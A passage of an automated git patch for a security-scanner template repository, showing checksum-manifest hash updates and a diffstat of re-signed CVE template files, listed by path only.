+http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:396a92a699ddd149abdf512cea1e52e5a9137658 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:74ff6cb69e97166c830146d9d619d4e0965bd31a -http/technologies/wordpress/plugins/wp-file-manager.yaml:baca9b7a7638cf9b624965aacf66c366c799a370 -http/technologies/wordpress/plugins/wp-google-maps.yaml:adb08c2944ec7fa2b6025053928b2c1e0f1abb0b -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:c2977e8c3195fa7fd78ff090ba68a64699f92703 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:f6a9229bb75d0aed544d9962ce7a9f43f5d9e3bb -http/technologies/wordpress/plugins/wp-migrate-db.yaml:2804ebc7232f2694cdb1a97b7896edaca4bafd17 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:1fd7a567e029a9dd88b39d4485d60e05c7d565c6 -http/technologies/wordpress/plugins/wp-optimize.yaml:1ad4bb9d4d12bcbba5f44075c1108440ffc84a81 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:a2fbfae2735693656584c7552460f06bd2c31456 -http/technologies/wordpress/plugins/wp-reset.yaml:2dac386a26a8f02a5185d2541a410230ff87dcba -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:88d8038b0999027bdfb370d93538f593b42491f2 -http/technologies/wordpress/plugins/wp-rollback.yaml:767bcd4386eee01b836c923911ca0e96d0b8bf39 -http/technologies/wordpress/plugins/wp-seopress.yaml:c462beaec35f5509a78311d7bc5308554492b3a4 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:da07d918728c777eb0d097d87387535c1b1c57d3 -http/technologies/wordpress/plugins/wp-smushit.yaml:a47786483a25c0e10aa90cfed2135af7cf54ce93 -http/technologies/wordpress/plugins/wp-statistics.yaml:fa0607e1039fa6a441fb53c9774f636c73fc12b8 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdbb3fe6fbbb0061c4d0a0edec70acb6a0b4713c -http/technologies/wordpress/plugins/wp-user-avatar.yaml:6f7559762238b33e47ef72599ad7dbc108ac2032 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9cc10c3c253dcd3c20f65e7bd49f46a9202c4659 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:d1c182621a46714a106415e822f9ab868f47eaf2 -http/technologies/wordpress/plugins/wpforms-lite.yaml:02453c725f5f498d2e22cc5797e0f5b8bf6883df -http/technologies/wordpress/plugins/wps-hide-login.yaml:1dae9f8e1672c6e9ad0694a578cad51016bd9d9b -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f0fb8fc2c0ed09ba421414347e37e1e017d6eed3 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245 +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:3e9c1ca901ab99159463474020f5793eba04c359 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:937cc05d463b4e9d17c09fba39056fdbdb187056 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f http/technologies/wso2-products-detect.yaml:810c03f8a2986fd7939b83bca35b9a6f95196a63 @@ -6522,7 +6524,7 @@ http/token-spray/api-visualstudio.yaml:a0e7c85b17ab0b6080c8a187592ef393fa0a0e69 http/token-spray/api-wakatime.yaml:6e9c443eef3f3fc501ea24e373bbb919964e9705 http/token-spray/api-web3storage.yaml:0a68b09a56fb746c8e497541066e4eeafcdc1846 http/token-spray/api-webex.yaml:5eac6fd40e40598768184adffee46a10e6e3e5eb -http/token-spray/api-weglot.yaml:0c9b98a106b4ed7b787941aa8f847402c59bdc5d +http/token-spray/api-weglot.yaml:ea99e670ebc787713e3a9aab67fdd1d4380f0937 http/token-spray/api-wordcloud.yaml:74f33bece9584161d811fd58977d4be8a92d25e7 http/token-spray/api-wordnik.yaml:a7d77ed3156f4ebe4c7c16329afc8ca6c5f3059e http/token-spray/api-youtube.yaml:4aa93c7e149ba16f89cd95fb0ed95d53904b6cc0 @@ -6555,7 +6557,7 @@ http/token-spray/google-timezone.yaml:810190cf9c433c43ce6f551f29e6767f15f7412f http/token-spray/googlet-extsearchplaces.yaml:b136a266a5998ad603817d34d8bb0ce9599a9401 http/vulnerabilities/74cms/74cms-weixin-sqli.yaml:2d87bdfcd0dd6b777635096b6ff8ec5d1ca69559 http/vulnerabilities/amazon/amazon-ec2-ssrf.yaml:496cc34d7d9b138c78b6a8779d8da8cb498b89a1 -http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml:589b5a7256f64174fbbba66ac898d76e90d1c99c +http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml:c90c327a5eb20b33a89e8c4bef53cac2eefac46d http/vulnerabilities/apache/apache-flink-unauth-rce.yaml:0a7ce14a72d4914f195dc3b2ed413f44bdc22ec5 http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml:5e7e6e37c58c3416c48b2c4904c0509af3def15e http/vulnerabilities/apache/apache-solr-file-read.yaml:0a4ed215fe43e7fb4f0be607787a637a80773bb0 @@ -6920,7 +6922,7 @@ http/vulnerabilities/other/pmb-directory-traversal.yaml:3edd65226116e222366fb702 http/vulnerabilities/other/pmb-local-file-disclosure.yaml:a98bdbfe2c304c27096a31febde9927d89073c1b http/vulnerabilities/other/pmb-sqli.yaml:3915b2f67734f964348c4edbc796a0e8f8020ac0 http/vulnerabilities/other/pmb-xss.yaml:650ab5217e0526f0c97f88eb68e6277794410f0d -http/vulnerabilities/other/podcast-generator-ssrf.yaml:34e43c6c3251be4fd275a035f02254fbd7268a16 +http/vulnerabilities/other/podcast-generator-ssrf.yaml:c29ec9c5430e9400d371428c2a62169a2523f879 http/vulnerabilities/other/pollbot-redirect.yaml:24e331e5f53a3512a35ff500a32d9c20ca794d14 http/vulnerabilities/other/powercreator-cms-rce.yaml:6b19894a6638241e4005de920b14a99cc3defab5 http/vulnerabilities/other/processmaker-lfi.yaml:6afa449fc4dad2734e59b32eea7f6eaded68bde3 @@ -6990,7 +6992,7 @@ http/vulnerabilities/other/umbraco-base-ssrf.yaml:ea8dfdafa0a708fbc68580bcc3d569 http/vulnerabilities/other/unauth-hoteldruid-panel.yaml:279bc487a6928ac8687f5e2e94a7c46eeee730cc http/vulnerabilities/other/unauth-spark-api.yaml:d3205ad468e29b3fd6d59637db539399b1c93c64 http/vulnerabilities/other/unifi-network-log4j-rce.yaml:e069000cf585f98b36dbdb4e104d0947d9671efe -http/vulnerabilities/other/universal-media-xss.yaml:38e6abb13815694dec7190791303e16d02dfce88 +http/vulnerabilities/other/universal-media-xss.yaml:d7ccabe58fa89179846bb1bfc7fad38675a2b06b http/vulnerabilities/other/vanguard-post-xss.yaml:ebea3529277da89f92f263b4c2e01b1440ead349 http/vulnerabilities/other/viewlinc-crlf-injection.yaml:dc9df9a7e0f610a07fe7611c166ae358706450ce http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml:634e100cbc4d958ea92b0cb1b7efa1d9acfe5982 @@ -7502,7 +7504,7 @@ ssl/tls-version.yaml:07fa612fd325ec70b698e4a4e1c0d6e7a5a399bc ssl/untrusted-root-certificate.yaml:867f13cbcd5d5a3d8e1c25051b362bd33063d471 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:a9d9f6def93c1d9b97464661b10a91a91598cee6 +templates-checksum.txt:8e18767e78ec7fd660eb7a3b7d8f72a0f1aae47a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 57fc09100ff386cf90658403df4b7adf665fd118 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 31 Oct 2023 09:39:52 +0000 Subject: [PATCH 5/7] Auto Template Signing [Tue Oct 31 09:39:52 UTC 2023] :robot: --- http/cves/2000/CVE-2000-0114.yaml | 3 +-- http/cves/2001/CVE-2001-0537.yaml | 3 +-- http/cves/2002/CVE-2002-1131.yaml | 3 +-- http/cves/2004/CVE-2004-0519.yaml | 3 +-- http/cves/2004/CVE-2004-1965.yaml | 3 +-- http/cves/2005/CVE-2005-2428.yaml | 3 +-- http/cves/2005/CVE-2005-3344.yaml | 3 +-- http/cves/2005/CVE-2005-3634.yaml | 3 +-- http/cves/2005/CVE-2005-4385.yaml | 3 +-- http/cves/2006/CVE-2006-1681.yaml | 3 +-- http/cves/2006/CVE-2006-2842.yaml | 3 +-- http/cves/2007/CVE-2007-0885.yaml | 3 +-- http/cves/2007/CVE-2007-4504.yaml | 3 +-- http/cves/2007/CVE-2007-4556.yaml | 3 +-- http/cves/2007/CVE-2007-5728.yaml | 3 +-- http/cves/2008/CVE-2008-1059.yaml | 3 +-- http/cves/2008/CVE-2008-1061.yaml | 3 +-- http/cves/2008/CVE-2008-1547.yaml | 3 +-- http/cves/2008/CVE-2008-2650.yaml | 3 +-- http/cves/2008/CVE-2008-4668.yaml | 3 +-- http/cves/2008/CVE-2008-5587.yaml | 3 +-- http/cves/2008/CVE-2008-6080.yaml | 3 +-- http/cves/2008/CVE-2008-6172.yaml | 3 +-- http/cves/2008/CVE-2008-6222.yaml | 3 +-- http/cves/2008/CVE-2008-6465.yaml | 3 +-- http/cves/2008/CVE-2008-6668.yaml | 3 +-- http/cves/2008/CVE-2008-6982.yaml | 3 +-- http/cves/2008/CVE-2008-7269.yaml | 3 +-- http/cves/2009/CVE-2009-0347.yaml | 3 +-- http/cves/2009/CVE-2009-0932.yaml | 3 +-- http/cves/2009/CVE-2009-1151.yaml | 3 +-- http/cves/2009/CVE-2009-1496.yaml | 3 +-- http/cves/2009/CVE-2009-1558.yaml | 3 +-- http/cves/2009/CVE-2009-2015.yaml | 3 +-- http/cves/2009/CVE-2009-2100.yaml | 3 +-- http/cves/2009/CVE-2009-3053.yaml | 3 +-- http/cves/2009/CVE-2009-3318.yaml | 3 +-- http/cves/2009/CVE-2009-4202.yaml | 3 +-- http/cves/2009/CVE-2009-4223.yaml | 3 +-- http/cves/2009/CVE-2009-4679.yaml | 3 +-- http/cves/2009/CVE-2009-5020.yaml | 3 +-- http/cves/2009/CVE-2009-5114.yaml | 3 +-- http/cves/2010/CVE-2010-0157.yaml | 3 +-- http/cves/2010/CVE-2010-0467.yaml | 3 +-- http/cves/2010/CVE-2010-0696.yaml | 3 +-- http/cves/2010/CVE-2010-0759.yaml | 3 +-- http/cves/2010/CVE-2010-0942.yaml | 3 +-- http/cves/2010/CVE-2010-0943.yaml | 3 +-- http/cves/2010/CVE-2010-0944.yaml | 3 +-- http/cves/2010/CVE-2010-0972.yaml | 3 +-- http/cves/2010/CVE-2010-0982.yaml | 3 +-- http/cves/2010/CVE-2010-0985.yaml | 3 +-- http/cves/2010/CVE-2010-1056.yaml | 3 +-- http/cves/2010/CVE-2010-1081.yaml | 3 +-- http/cves/2010/CVE-2010-1217.yaml | 3 +-- http/cves/2010/CVE-2010-1219.yaml | 3 +-- http/cves/2010/CVE-2010-1302.yaml | 3 +-- http/cves/2010/CVE-2010-1304.yaml | 3 +-- http/cves/2010/CVE-2010-1305.yaml | 3 +-- http/cves/2010/CVE-2010-1306.yaml | 3 +-- http/cves/2010/CVE-2010-1307.yaml | 3 +-- http/cves/2010/CVE-2010-1308.yaml | 3 +-- http/cves/2010/CVE-2010-1312.yaml | 3 +-- http/cves/2010/CVE-2010-1313.yaml | 3 +-- http/cves/2010/CVE-2010-1314.yaml | 3 +-- http/cves/2010/CVE-2010-1315.yaml | 3 +-- http/cves/2010/CVE-2010-1340.yaml | 3 +-- http/cves/2010/CVE-2010-1345.yaml | 3 +-- http/cves/2010/CVE-2010-1352.yaml | 3 +-- http/cves/2010/CVE-2010-1353.yaml | 3 +-- http/cves/2010/CVE-2010-1354.yaml | 3 +-- http/cves/2010/CVE-2010-1429.yaml | 3 +-- http/cves/2010/CVE-2010-1461.yaml | 3 +-- http/cves/2010/CVE-2010-1469.yaml | 3 +-- http/cves/2010/CVE-2010-1470.yaml | 3 +-- http/cves/2010/CVE-2010-1471.yaml | 3 +-- http/cves/2010/CVE-2010-1472.yaml | 3 +-- http/cves/2010/CVE-2010-1473.yaml | 3 +-- http/cves/2010/CVE-2010-1474.yaml | 3 +-- http/cves/2010/CVE-2010-1475.yaml | 3 +-- http/cves/2010/CVE-2010-1476.yaml | 3 +-- http/cves/2010/CVE-2010-1478.yaml | 3 +-- http/cves/2010/CVE-2010-1491.yaml | 3 +-- http/cves/2010/CVE-2010-1494.yaml | 3 +-- http/cves/2010/CVE-2010-1495.yaml | 3 +-- http/cves/2010/CVE-2010-1531.yaml | 3 +-- http/cves/2010/CVE-2010-1532.yaml | 3 +-- http/cves/2010/CVE-2010-1533.yaml | 3 +-- http/cves/2010/CVE-2010-1534.yaml | 3 +-- http/cves/2010/CVE-2010-1535.yaml | 3 +-- http/cves/2010/CVE-2010-1540.yaml | 3 +-- http/cves/2010/CVE-2010-1586.yaml | 3 +-- http/cves/2010/CVE-2010-1601.yaml | 3 +-- http/cves/2010/CVE-2010-1602.yaml | 3 +-- http/cves/2010/CVE-2010-1603.yaml | 3 +-- http/cves/2010/CVE-2010-1607.yaml | 3 +-- http/cves/2010/CVE-2010-1653.yaml | 3 +-- http/cves/2010/CVE-2010-1657.yaml | 3 +-- http/cves/2010/CVE-2010-1658.yaml | 3 +-- http/cves/2010/CVE-2010-1659.yaml | 3 +-- http/cves/2010/CVE-2010-1714.yaml | 3 +-- http/cves/2010/CVE-2010-1715.yaml | 3 +-- http/cves/2010/CVE-2010-1717.yaml | 3 +-- http/cves/2010/CVE-2010-1718.yaml | 3 +-- http/cves/2010/CVE-2010-1719.yaml | 3 +-- http/cves/2010/CVE-2010-1722.yaml | 3 +-- http/cves/2010/CVE-2010-1723.yaml | 3 +-- http/cves/2010/CVE-2010-1858.yaml | 3 +-- http/cves/2010/CVE-2010-1870.yaml | 3 +-- http/cves/2010/CVE-2010-1875.yaml | 3 +-- http/cves/2010/CVE-2010-1878.yaml | 3 +-- http/cves/2010/CVE-2010-1952.yaml | 3 +-- http/cves/2010/CVE-2010-1953.yaml | 3 +-- http/cves/2010/CVE-2010-1954.yaml | 3 +-- http/cves/2010/CVE-2010-1955.yaml | 3 +-- http/cves/2010/CVE-2010-1956.yaml | 3 +-- http/cves/2010/CVE-2010-1957.yaml | 3 +-- http/cves/2010/CVE-2010-1977.yaml | 3 +-- http/cves/2010/CVE-2010-1979.yaml | 3 +-- http/cves/2010/CVE-2010-1981.yaml | 3 +-- http/cves/2010/CVE-2010-1982.yaml | 3 +-- http/cves/2010/CVE-2010-1983.yaml | 3 +-- http/cves/2010/CVE-2010-2033.yaml | 3 +-- http/cves/2010/CVE-2010-2034.yaml | 3 +-- http/cves/2010/CVE-2010-2035.yaml | 3 +-- http/cves/2010/CVE-2010-2036.yaml | 3 +-- http/cves/2010/CVE-2010-2037.yaml | 3 +-- http/cves/2010/CVE-2010-2045.yaml | 3 +-- http/cves/2010/CVE-2010-2050.yaml | 3 +-- http/cves/2010/CVE-2010-2122.yaml | 3 +-- http/cves/2010/CVE-2010-2128.yaml | 3 +-- http/cves/2010/CVE-2010-2259.yaml | 3 +-- http/cves/2010/CVE-2010-2307.yaml | 3 +-- http/cves/2010/CVE-2010-2507.yaml | 3 +-- http/cves/2010/CVE-2010-2680.yaml | 3 +-- http/cves/2010/CVE-2010-2682.yaml | 3 +-- http/cves/2010/CVE-2010-2857.yaml | 3 +-- http/cves/2010/CVE-2010-2861.yaml | 3 +-- http/cves/2010/CVE-2010-2918.yaml | 3 +-- http/cves/2010/CVE-2010-2920.yaml | 3 +-- http/cves/2010/CVE-2010-3203.yaml | 3 +-- http/cves/2010/CVE-2010-3426.yaml | 3 +-- http/cves/2010/CVE-2010-4231.yaml | 3 +-- http/cves/2010/CVE-2010-4239.yaml | 3 +-- http/cves/2010/CVE-2010-4282.yaml | 3 +-- http/cves/2010/CVE-2010-4617.yaml | 3 +-- http/cves/2010/CVE-2010-4719.yaml | 3 +-- http/cves/2010/CVE-2010-4769.yaml | 3 +-- http/cves/2010/CVE-2010-4977.yaml | 3 +-- http/cves/2010/CVE-2010-5028.yaml | 3 +-- http/cves/2010/CVE-2010-5278.yaml | 3 +-- http/cves/2010/CVE-2010-5286.yaml | 3 +-- http/cves/2011/CVE-2011-0049.yaml | 3 +-- http/cves/2011/CVE-2011-1669.yaml | 3 +-- http/cves/2011/CVE-2011-2744.yaml | 3 +-- http/cves/2011/CVE-2011-2780.yaml | 3 +-- http/cves/2011/CVE-2011-3315.yaml | 3 +-- http/cves/2011/CVE-2011-4336.yaml | 3 +-- http/cves/2011/CVE-2011-4618.yaml | 3 +-- http/cves/2011/CVE-2011-4624.yaml | 3 +-- http/cves/2011/CVE-2011-4804.yaml | 3 +-- http/cves/2011/CVE-2011-4926.yaml | 3 +-- http/cves/2011/CVE-2011-5106.yaml | 3 +-- http/cves/2011/CVE-2011-5107.yaml | 3 +-- http/cves/2011/CVE-2011-5179.yaml | 3 +-- http/cves/2011/CVE-2011-5181.yaml | 3 +-- http/cves/2011/CVE-2011-5252.yaml | 3 +-- http/cves/2011/CVE-2011-5265.yaml | 3 +-- http/cves/2012/CVE-2012-0896.yaml | 3 +-- http/cves/2012/CVE-2012-0901.yaml | 3 +-- http/cves/2012/CVE-2012-0981.yaml | 3 +-- http/cves/2012/CVE-2012-0996.yaml | 3 +-- http/cves/2012/CVE-2012-1226.yaml | 3 +-- http/cves/2012/CVE-2012-1835.yaml | 3 +-- http/cves/2012/CVE-2012-2371.yaml | 3 +-- http/cves/2012/CVE-2012-4032.yaml | 3 +-- http/cves/2012/CVE-2012-4242.yaml | 3 +-- http/cves/2012/CVE-2012-4253.yaml | 3 +-- http/cves/2012/CVE-2012-4273.yaml | 3 +-- http/cves/2012/CVE-2012-4547.yaml | 3 +-- http/cves/2012/CVE-2012-4768.yaml | 3 +-- http/cves/2012/CVE-2012-4878.yaml | 3 +-- http/cves/2012/CVE-2012-4889.yaml | 3 +-- http/cves/2012/CVE-2012-4940.yaml | 3 +-- http/cves/2012/CVE-2012-4982.yaml | 3 +-- http/cves/2012/CVE-2012-5321.yaml | 3 +-- http/cves/2012/CVE-2012-5913.yaml | 3 +-- http/cves/2012/CVE-2012-6499.yaml | 3 +-- http/cves/2013/CVE-2013-1965.yaml | 3 +-- http/cves/2013/CVE-2013-2251.yaml | 3 +-- http/cves/2013/CVE-2013-2287.yaml | 3 +-- http/cves/2013/CVE-2013-2621.yaml | 3 +-- http/cves/2013/CVE-2013-3526.yaml | 3 +-- http/cves/2013/CVE-2013-4117.yaml | 3 +-- http/cves/2013/CVE-2013-4625.yaml | 3 +-- http/cves/2013/CVE-2013-5528.yaml | 3 +-- http/cves/2013/CVE-2013-5979.yaml | 3 +-- http/cves/2013/CVE-2013-6281.yaml | 3 +-- http/cves/2013/CVE-2013-7240.yaml | 3 +-- http/cves/2013/CVE-2013-7285.yaml | 3 +-- http/cves/2014/CVE-2014-10037.yaml | 3 +-- http/cves/2014/CVE-2014-1203.yaml | 3 +-- http/cves/2014/CVE-2014-2321.yaml | 3 +-- http/cves/2014/CVE-2014-2323.yaml | 3 +-- http/cves/2014/CVE-2014-2383.yaml | 3 +-- http/cves/2014/CVE-2014-2908.yaml | 3 +-- http/cves/2014/CVE-2014-3744.yaml | 3 +-- http/cves/2014/CVE-2014-4513.yaml | 3 +-- http/cves/2014/CVE-2014-4535.yaml | 3 +-- http/cves/2014/CVE-2014-4536.yaml | 3 +-- http/cves/2014/CVE-2014-4539.yaml | 3 +-- http/cves/2014/CVE-2014-4544.yaml | 3 +-- http/cves/2014/CVE-2014-4550.yaml | 3 +-- http/cves/2014/CVE-2014-4558.yaml | 3 +-- http/cves/2014/CVE-2014-4561.yaml | 3 +-- http/cves/2014/CVE-2014-4592.yaml | 3 +-- http/cves/2014/CVE-2014-4940.yaml | 3 +-- http/cves/2014/CVE-2014-4942.yaml | 3 +-- http/cves/2014/CVE-2014-5111.yaml | 3 +-- http/cves/2014/CVE-2014-5258.yaml | 3 +-- http/cves/2014/CVE-2014-5368.yaml | 3 +-- http/cves/2014/CVE-2014-6308.yaml | 3 +-- http/cves/2014/CVE-2014-8682.yaml | 3 +-- http/cves/2014/CVE-2014-8799.yaml | 3 +-- http/cves/2014/CVE-2014-9119.yaml | 3 +-- http/cves/2014/CVE-2014-9180.yaml | 3 +-- http/cves/2014/CVE-2014-9444.yaml | 3 +-- http/cves/2014/CVE-2014-9606.yaml | 3 +-- http/cves/2014/CVE-2014-9607.yaml | 3 +-- http/cves/2014/CVE-2014-9608.yaml | 3 +-- http/cves/2014/CVE-2014-9609.yaml | 3 +-- http/cves/2014/CVE-2014-9614.yaml | 3 +-- http/cves/2014/CVE-2014-9615.yaml | 3 +-- http/cves/2014/CVE-2014-9617.yaml | 3 +-- http/cves/2014/CVE-2014-9618.yaml | 3 +-- http/cves/2015/CVE-2015-0554.yaml | 3 +-- http/cves/2015/CVE-2015-1000005.yaml | 3 +-- http/cves/2015/CVE-2015-1000010.yaml | 3 +-- http/cves/2015/CVE-2015-1000012.yaml | 3 +-- http/cves/2015/CVE-2015-1427.yaml | 3 +-- http/cves/2015/CVE-2015-2067.yaml | 3 +-- http/cves/2015/CVE-2015-2068.yaml | 3 +-- http/cves/2015/CVE-2015-2080.yaml | 3 +-- http/cves/2015/CVE-2015-2166.yaml | 3 +-- http/cves/2015/CVE-2015-2196.yaml | 3 +-- http/cves/2015/CVE-2015-2755.yaml | 3 +-- http/cves/2015/CVE-2015-2807.yaml | 3 +-- http/cves/2015/CVE-2015-2863.yaml | 3 +-- http/cves/2015/CVE-2015-2996.yaml | 3 +-- http/cves/2015/CVE-2015-3224.yaml | 3 +-- http/cves/2015/CVE-2015-3337.yaml | 3 +-- http/cves/2015/CVE-2015-3648.yaml | 3 +-- http/cves/2015/CVE-2015-3897.yaml | 3 +-- http/cves/2015/CVE-2015-4050.yaml | 3 +-- http/cves/2015/CVE-2015-4062.yaml | 3 +-- http/cves/2015/CVE-2015-4063.yaml | 3 +-- http/cves/2015/CVE-2015-4074.yaml | 3 +-- http/cves/2015/CVE-2015-4127.yaml | 3 +-- http/cves/2015/CVE-2015-4414.yaml | 3 +-- http/cves/2015/CVE-2015-4632.yaml | 3 +-- http/cves/2015/CVE-2015-4668.yaml | 3 +-- http/cves/2015/CVE-2015-4694.yaml | 3 +-- http/cves/2015/CVE-2015-5354.yaml | 3 +-- http/cves/2015/CVE-2015-5461.yaml | 3 +-- http/cves/2015/CVE-2015-5469.yaml | 3 +-- http/cves/2015/CVE-2015-5471.yaml | 3 +-- http/cves/2015/CVE-2015-5531.yaml | 3 +-- http/cves/2015/CVE-2015-5688.yaml | 3 +-- http/cves/2015/CVE-2015-6477.yaml | 3 +-- http/cves/2015/CVE-2015-6544.yaml | 3 +-- http/cves/2015/CVE-2015-6920.yaml | 3 +-- http/cves/2015/CVE-2015-7377.yaml | 3 +-- http/cves/2015/CVE-2015-7780.yaml | 3 +-- http/cves/2015/CVE-2015-7823.yaml | 3 +-- http/cves/2015/CVE-2015-8349.yaml | 3 +-- http/cves/2015/CVE-2015-8399.yaml | 3 +-- http/cves/2015/CVE-2015-8813.yaml | 3 +-- http/cves/2015/CVE-2015-9312.yaml | 3 +-- http/cves/2015/CVE-2015-9323.yaml | 3 +-- http/cves/2015/CVE-2015-9414.yaml | 3 +-- http/cves/2015/CVE-2015-9480.yaml | 3 +-- http/cves/2016/CVE-2016-0957.yaml | 3 +-- http/cves/2016/CVE-2016-1000126.yaml | 3 +-- http/cves/2016/CVE-2016-1000127.yaml | 3 +-- http/cves/2016/CVE-2016-1000128.yaml | 3 +-- http/cves/2016/CVE-2016-1000129.yaml | 3 +-- http/cves/2016/CVE-2016-1000130.yaml | 3 +-- http/cves/2016/CVE-2016-1000131.yaml | 3 +-- http/cves/2016/CVE-2016-1000132.yaml | 3 +-- http/cves/2016/CVE-2016-1000133.yaml | 3 +-- http/cves/2016/CVE-2016-1000134.yaml | 3 +-- http/cves/2016/CVE-2016-1000135.yaml | 3 +-- http/cves/2016/CVE-2016-1000136.yaml | 3 +-- http/cves/2016/CVE-2016-1000137.yaml | 3 +-- http/cves/2016/CVE-2016-1000138.yaml | 3 +-- http/cves/2016/CVE-2016-1000139.yaml | 3 +-- http/cves/2016/CVE-2016-1000140.yaml | 3 +-- http/cves/2016/CVE-2016-1000141.yaml | 3 +-- http/cves/2016/CVE-2016-1000142.yaml | 3 +-- http/cves/2016/CVE-2016-1000143.yaml | 3 +-- http/cves/2016/CVE-2016-1000146.yaml | 3 +-- http/cves/2016/CVE-2016-1000148.yaml | 3 +-- http/cves/2016/CVE-2016-1000149.yaml | 3 +-- http/cves/2016/CVE-2016-1000152.yaml | 3 +-- http/cves/2016/CVE-2016-1000153.yaml | 3 +-- http/cves/2016/CVE-2016-1000154.yaml | 3 +-- http/cves/2016/CVE-2016-1000155.yaml | 3 +-- http/cves/2016/CVE-2016-10108.yaml | 3 +-- http/cves/2016/CVE-2016-10134.yaml | 3 +-- http/cves/2016/CVE-2016-10367.yaml | 3 +-- http/cves/2016/CVE-2016-10368.yaml | 3 +-- http/cves/2016/CVE-2016-10924.yaml | 3 +-- http/cves/2016/CVE-2016-10940.yaml | 3 +-- http/cves/2016/CVE-2016-10956.yaml | 3 +-- http/cves/2016/CVE-2016-10960.yaml | 3 +-- http/cves/2016/CVE-2016-10973.yaml | 3 +-- http/cves/2016/CVE-2016-10993.yaml | 3 +-- http/cves/2016/CVE-2016-2389.yaml | 3 +-- http/cves/2016/CVE-2016-3088.yaml | 3 +-- http/cves/2016/CVE-2016-3978.yaml | 3 +-- http/cves/2016/CVE-2016-4975.yaml | 3 +-- http/cves/2016/CVE-2016-4977.yaml | 3 +-- http/cves/2016/CVE-2016-5649.yaml | 3 +-- http/cves/2016/CVE-2016-6195.yaml | 3 +-- http/cves/2016/CVE-2016-7981.yaml | 3 +-- http/cves/2016/CVE-2016-8527.yaml | 3 +-- http/cves/2017/CVE-2017-0929.yaml | 3 +-- http/cves/2017/CVE-2017-1000029.yaml | 